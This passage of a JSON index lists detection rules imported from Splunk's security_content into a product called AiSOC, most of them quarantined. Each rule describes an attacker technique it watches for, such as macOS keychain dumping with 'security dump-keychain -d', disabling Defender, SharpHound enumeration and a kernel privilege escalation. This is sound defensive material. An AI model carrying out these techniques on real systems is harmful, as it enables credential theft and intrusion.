"detections/splunk-imports/_quarantine/windows-ad-privileged-object-access-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc2f58bc-8cd2-4e51-962a-694b963acde0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_privileged_object_access_activity.yml" } }, { "id": "splunk-security-content-dc4dc3a8-ff54-11eb-8bf7-acde48001122", "type": "detection", "name": "Gsuite Outbound Email With Attachment To External Domain", "description": "The following analytic detects outbound emails with attachments sent from an internal email domain to an external domain. It leverages Gsuite Gmail logs, parsing the source and destination email domains, and flags emails with fewer than 20 outbound instances. This activity is significant as it may indicate potential data exfiltration or insider threats. If confirmed malicious, an attacker could use this method to exfiltrate sensitive information, leading to data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-outbound-email-with-attachment-to-external-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc4dc3a8-ff54-11eb-8bf7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_outbound_email_with_attachment_to_external_domain.yml" } }, { "id": "splunk-security-content-dc64d064-d346-11eb-8588-acde48001122", "type": "detection", "name": "Execute Javascript With Jscript COM CLSID", "description": "The following analytic detects the execution of JavaScript using the JScript.Encode CLSID (COM Object) by cscript.exe. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and parent processes. This activity is significant as it is a known technique used by ransomware, such as Reddot, to execute malicious scripts and potentially disable AMSI (Antimalware Scan Interface). If confirmed malicious, this behavior could allow attackers to execute arbitrary code, evade detection, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/execute-javascript-with-jscript-com-clsid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc64d064-d346-11eb-8588-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/execute_javascript_with_jscript_com_clsid.yml" } }, { "id": "splunk-security-content-dc65678c-301f-11ec-8e30-acde48001122", "type": "detection", "name": "Disable Defender Enhanced Notification", "description": "The following analytic detects the modification of the registry to disable Windows Defender's Enhanced Notification feature. It leverages data from Endpoint Detection and Response (EDR) agents, specifically monitoring changes to the registry path associated with Windows Defender reporting. This activity is significant because disabling Enhanced Notifications can prevent users and administrators from receiving critical security alerts, potentially allowing malicious activities to go unnoticed. If confirmed malicious, this action could enable an attacker to bypass detection mechanisms, maintain persistence, and escalate their activities without triggering alerts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-enhanced-notification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc65678c-301f-11ec-8e30-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_enhanced_notification.yml" } }, { "id": "splunk-security-content-dc6a5613-d024-47e7-9997-ab6477a483d3", "type": "detection", "name": "Windows Impair Defenses Disable Auto Logger Session", "description": "The following analytic detects the disabling of an AutoLogger session or one of its providers, by identifying changes to the Registry values \"Start\" and \"Enabled\" part of the \"\\WMI\\Autologger\\\" key path. It leverages data from the Endpoint.Registry datamodel to monitor specific registry paths and values. This activity is significant as attackers and adversaries can leverage this in order to evade defense and blind EDRs and log ingest tooling. If confirmed malicious, this action could allow an attacker to conceal their activities, making it harder to detect further malicious actions and maintain persistence on the compromised endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-auto-logger-session.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc6a5613-d024-47e7-9997-ab6477a483d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_auto_logger_session.yml" } }, { "id": "splunk-security-content-dc7a8004-0f18-11ec-8c54-acde48001122", "type": "detection", "name": "Bcdedit Command Back To Normal Mode Boot", "description": "The following analytic detects the execution of a suspicious `bcdedit` command that reconfigures a host from safe mode back to normal boot. This detection leverages Endpoint Detection and Response (EDR) data, focusing on command-line executions involving `bcdedit.exe` with specific parameters. This activity is significant as it may indicate the presence of ransomware, such as BlackMatter, which manipulates boot configurations to facilitate encryption processes. If confirmed malicious, this behavior could allow attackers to maintain control over the boot process, potentially leading to further system compromise and data encryption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bcdedit-command-back-to-normal-mode-boot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc7a8004-0f18-11ec-8c54-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml" } }, { "id": "splunk-security-content-dcb45a09-5e6f-441e-b2f8-cbbf923e36d9", "type": "detection", "name": "MacOS Keychains Dumped", "description": "Detects command-line attempts to access or dump macOS Keychain data using native utilities or direct file access.\nThis includes credential dumping via the `security` utility (e.g. `dump-keychain -d`), bulk certificate export using `security find-certificate`, and direct file copying of Keychain database files using utilities such as `cat`.\nKeychain files are located in `~/Library/Keychains/`, `/Library/Keychains/`, and `/Network/Library/Keychains/`.\nThis technique is commonly associated with post-exploitation credential harvesting, where an attacker with local access seeks to escalate privileges or move laterally by obtaining stored credentials for applications, Wi-Fi networks, system services, and certificates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1555.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-keychains-dumped.yaml", "provenance": { "source": "splunk/security_content", "source_id": "dcb45a09-5e6f-441e-b2f8-cbbf923e36d9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_keychains_dumped.yml" } }, { "id": "splunk-security-content-dcc89bde-5f24-11ec-87ca-acde48001122", "type": "detection", "name": "Linux Possible Cronjob Modification With Editor", "description": "The following analytic detects potential unauthorized modifications to Linux cronjobs using text editors like \"nano,\" \"vi,\" or \"vim.\" It identifies this activity by monitoring command-line executions that interact with cronjob configuration paths. This behavior is significant for a SOC as it may indicate attempts at privilege escalation or establishing persistent access. If confirmed malicious, the impact could be severe, allowing attackers to execute damaging actions such as data theft, system sabotage, or further network penetration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-cronjob-modification-with-editor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcc89bde-5f24-11ec-87ca-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_cronjob_modification_with_editor.yml" } }, { "id": "splunk-security-content-dcf74b22-7933-11ec-857c-acde48001122", "type": "detection", "name": "Windows InstallUtil in Non Standard Path", "description": "The following analytic detects the execution of InstallUtil.exe from non-standard paths. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and original file names outside typical directories. This activity is significant because InstallUtil.exe is often used by attackers to execute malicious code or scripts. If confirmed malicious, this behavior could allow an attacker to bypass security controls, execute arbitrary code, and potentially gain unauthorized access or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-in-non-standard-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcf74b22-7933-11ec-857c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_in_non_standard_path.yml" } }, { "id": "splunk-security-content-dcfd6b40-42f9-469d-a433-2e53f7486664", "type": "detection", "name": "Detect Prohibited Applications Spawning cmd exe", "description": "The following analytic detects executions of cmd.exe spawned by processes that are commonly abused by attackers and do not typically launch cmd.exe. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUID, process name, parent process, and command-line executions. This activity is significant because it may indicate an attempt to execute unauthorized commands or scripts, often a precursor to further malicious actions. If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-prohibited-applications-spawning-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcfd6b40-42f9-469d-a433-2e53f7486664", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml" } }, { "id": "splunk-security-content-dcfd6b40-42f9-469d-a433-2e53f7489ff4", "type": "detection", "name": "Detect Unauthorized Assets by MAC address", "description": "The following analytic identifies unauthorized devices attempting to connect to the organization's network by inspecting DHCP request packets. It detects this activity by comparing the MAC addresses in DHCP requests against a list of known authorized devices stored in the assets_by_str.csv file. This activity is significant for a SOC because unauthorized devices can pose security risks, including potential data breaches or network disruptions. If confirmed malicious, this activity could allow an attacker to gain unauthorized network access, potentially leading to further exploitation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-unauthorized-assets-by-mac-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcfd6b40-42f9-469d-a433-2e53f7489ff4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_unauthorized_assets_by_mac_address.yml" } }, { "id": "splunk-security-content-dd04b29a-beed-11eb-87bc-acde48001122", "type": "detection", "name": "Detect SharpHound Usage", "description": "The following analytic detects the usage of the SharpHound binary by identifying its original filename, `SharpHound.exe`, and the process name. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process metadata and command-line executions. SharpHound is a tool used for Active Directory enumeration, often by attackers during the reconnaissance phase. If confirmed malicious, this activity could allow an attacker to map out the network, identify high-value targets, and plan further attacks, potentially leading to privilege escalation and lateral movement within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-sharphound-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd04b29a-beed-11eb-87bc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_sharphound_usage.yml" } }, { "id": "splunk-security-content-dd0f07ea-f08f-4d88-96e5-cb58156e82b6", "type": "detection", "name": "Windows Service Stop Attempt", "description": "The following analytic identifies attempts to stop services on a system using `net.exe`, `sc.exe` or the \"Stop-Service\" cmdlet. It leverages Endpoint Detection and Response (EDR) telemetry. This activity can be significant as adversaries often terminate security or critical services to evade detection and further their objectives. If confirmed malicious, this behavior could allow attackers to disable security defenses, facilitate ransomware encryption, or disrupt essential services, leading to potential data loss or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-stop-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd0f07ea-f08f-4d88-96e5-cb58156e82b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_stop_attempt.yml" } }, { "id": "splunk-security-content-dd16294f-44d2-40b4-a869-542c0b85113a", "type": "detection", "name": "Linux Auditd Copy Fail Privilege Escalation", "description": "Detects the exploitation pattern associated with Copy Fail.\nCopy Fail (CVE-2026-31431) is a logic bug in the Linux kernel's authentication cryptographic template.\nIt lets an unprivileged local user trigger a deterministic, controlled 4-byte write into the page cache of any readable file on the system.\nA single 732-byte Python script can edit a setuid binary and obtain root on essentially all Linux distributions shipped since 2017.\nThis search relies on the auditd configuration linked in the references section. If you are using a custom configuration, make sure the Key names are the same or adapt the search accordingly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-copy-fail-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd16294f-44d2-40b4-a869-542c0b85113a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_copy_fail_privilege_escalation.yml" } }, { "id": "splunk-security-content-dd6afee6-e0a3-4028-a089-f47dd2842c22", "type": "detection", "name": "Kubernetes Anomalous Outbound Network Activity from Process", "description": "The following analytic identifies anomalously high outbound network activity from processes running within containerized workloads in a Kubernetes environment. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares recent network metrics (tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets) over the last hour with the average metrics over the past 30 days. This activity is significant as it may indicate data exfiltration, process modification, or container compromise. If confirmed malicious, it could lead to unauthorized data exfiltration, communication with malicious entities, or further attacks within the containerized environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-outbound-network-activity-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd6afee6-e0a3-4028-a089-f47dd2842c22", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_outbound_network_activity_from_process.yml" } }, { "id": "splunk-security-content-dd6d1f16-adc0-4e87-9c34-06189516b803", "type": "detection", "name": "Windows Known Abused DLL Loaded Suspiciously", "description": "The following analytic detects when DLLs with known abuse history are loaded from an unusual location. This activity may represent an attacker performing a DLL search order or sideload hijacking technique. These techniques are used to gain persistence as well as elevate privileges on the target system. This detection relies on Sysmon EID7 and is compatible with all Officla Sysmon TA versions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-known-abused-dll-loaded-suspiciously.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd6d1f16-adc0-4e87-9c34-06189516b803", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_known_abused_dll_loaded_suspiciously.yml" } }, { "id": "splunk-security-content-dd7798cf-c4f5-4114-ad0f-beacd9a33708", "type": "detection", "name": "O365 Email Send and Hard Delete Exfiltration Behavior", "description": "The following analytic identifies when an O365 email account sends and then hard deletes an email to an external recipient within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to remove forensic artifacts or evidence of exfiltration activity. This behavior is often seen when threat actors want to reduce the probability of detection by the compromised account owner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001", "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-send-and-hard-delete-exfiltration-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd7798cf-c4f5-4114-ad0f-beacd9a33708", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_send_and_hard_delete_exfiltration_behavior.yml" } }, { "id": "splunk-security-content-dd7da098-83b8-4c48-b09d-e51aeb621e81", "type": "detection", "name": "Windows Net System Service Discovery", "description": "The following analytic detects the enumeration of Windows services using the net start command, which is a built-in utility that lists all running services on a system. Adversaries, system administrators, or automated tools may use this command to gain situational awareness of what services are active, identify potential security software, or discover opportunities for privilege escalation and lateral movement. The execution of net start is often associated with reconnaissance activity during the early stages of an intrusion, as attackers attempt to map out the system\u2019s defense mechanisms and operational services. By monitoring process execution for instances of cmd.exe /c net start or similar command-line usage, defenders can detect potentially suspicious activity. Correlating this behavior with other reconnaissance commands, such as tasklist or sc query, strengthens detection fidelity. While net start is not inherently malicious, unusual or repeated use in non-administrative contexts should be flagged for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-net-system-service-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd7da098-83b8-4c48-b09d-e51aeb621e81", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_net_system_service_discovery.yml" } }, { "id": "splunk-security-content-dd83407e-439f-11ec-ab8e-acde48001122", "type": "detection", "name": "Network Discovery Using Route Windows App", "description": "The following analytic detects the execution of the `route.exe` Windows application, commonly used for network discovery. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. This activity is significant because adversaries often use `route.exe` to map network routes and identify potential targets within a network. If confirmed malicious, this behavior could allow attackers to gain insights into network topology, facilitating lateral movement and further exploitation. Note that false positives may occur due to legitimate administrative tasks or automated scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-discovery-using-route-windows-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd83407e-439f-11ec-ab8e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_discovery_using_route_windows_app.yml" } }, { "id": "splunk-security-content-dda126d7-1d99-4f0b-b72a-4c14031f9398", "type": "detection", "name": "Windows Access Token Manipulation Winlogon Duplicate Token Handle", "description": "The following analytic detects a process attempting to access winlogon.exe to duplicate its handle. This is identified using Sysmon EventCode 10, focusing on processes targeting winlogon.exe with specific access rights. This activity is significant because it is a common technique used by adversaries to escalate privileges by leveraging the high privileges and security tokens associated with winlogon.exe. If confirmed malicious, this could allow an attacker to gain elevated privileges, potentially leading to full system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-access-token-manipulation-winlogon-duplicate-token-handle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dda126d7-1d99-4f0b-b72a-4c14031f9398", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_access_token_manipulation_winlogon_duplicate_token_handle.yml" } }, { "id": "splunk-security-content-ddf82fcb-e9ee-40e3-8712-a50b5bf323fc", "type": "detection", "name": "Windows PowerShell ScheduleTask", "description": "The following analytic detects potential malicious activities involving PowerShell's task scheduling cmdlets. It leverages PowerShell Script Block Logging (EventCode 4104) to identify unusual or suspicious use of cmdlets like 'New-ScheduledTask' and 'Set-ScheduledTask'. This activity is significant as attackers often use these cmdlets for persistence and remote execution of malicious code. If confirmed malicious, this could allow attackers to maintain access, deliver additional payloads, or execute ransomware, leading to data theft or other severe impacts. Immediate investigation and mitigation are crucial to prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-scheduletask.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ddf82fcb-e9ee-40e3-8712-a50b5bf323fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_scheduletask.yml" } }, { "id": "splunk-security-content-de365ffa-42f5-46b5-b43f-fa72290b8218", "type": "detection", "name": "Okta Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies instances where more than 10 unique user accounts have failed to authenticate from a single IP address within a 5-minute window in an Okta tenant. This detection uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud. Such activity is significant as it may indicate brute-force attacks or password spraying attempts. If confirmed malicious, this behavior suggests an external entity is attempting to compromise multiple user accounts, potentially leading to unauthorized access to organizational resources and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de365ffa-42f5-46b5-b43f-fa72290b8218", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-de62b809-a04d-46b5-9a15-8298d330f0c8", "type": "detection", "name": "Linux Stdout Redirection To Dev Null File", "description": "The following analytic detects command-line activities that redirect stdout or stderr to the /dev/null file. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This behavior is significant as it can indicate attempts to hide command outputs, a technique observed in the CyclopsBlink malware to conceal modifications to iptables firewall settings. If confirmed malicious, this activity could allow an attacker to stealthily alter system configurations, potentially leading to unauthorized access or persistent control over the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-stdout-redirection-to-dev-null-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de62b809-a04d-46b5-9a15-8298d330f0c8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_stdout_redirection_to_dev_null_file.yml" } }, { "id": "splunk-security-content-de7fcadc-04f3-11ec-a241-acde48001122", "type": "detection", "name": "AdsiSearcher Account Discovery", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell to query Active Directory for domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify script blocks containing `[adsisearcher]`, `objectcategory=user`, and `.findAll()`. This activity is significant as it may indicate an attempt by adversaries or Red Teams to enumerate domain users for situational awareness and Active Directory discovery. If confirmed malicious, this could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/adsisearcher-account-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de7fcadc-04f3-11ec-a241-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/adsisearcher_account_discovery.yml" } }, { "id": "splunk-security-content-de81bc46-9213-11eb-adc9-acde48001122", "type": "detection", "name": "Disabling NoRun Windows App", "description": "The following analytic detects the modification of the Windows registry to disable the Run application in the Start menu. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" with a value of \"0x00000001\". This activity is significant because the Run application is a useful shortcut for executing known applications and scripts. If confirmed malicious, this action could hinder system cleaning efforts and make it more difficult to run essential tools, thereby aiding malware persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", 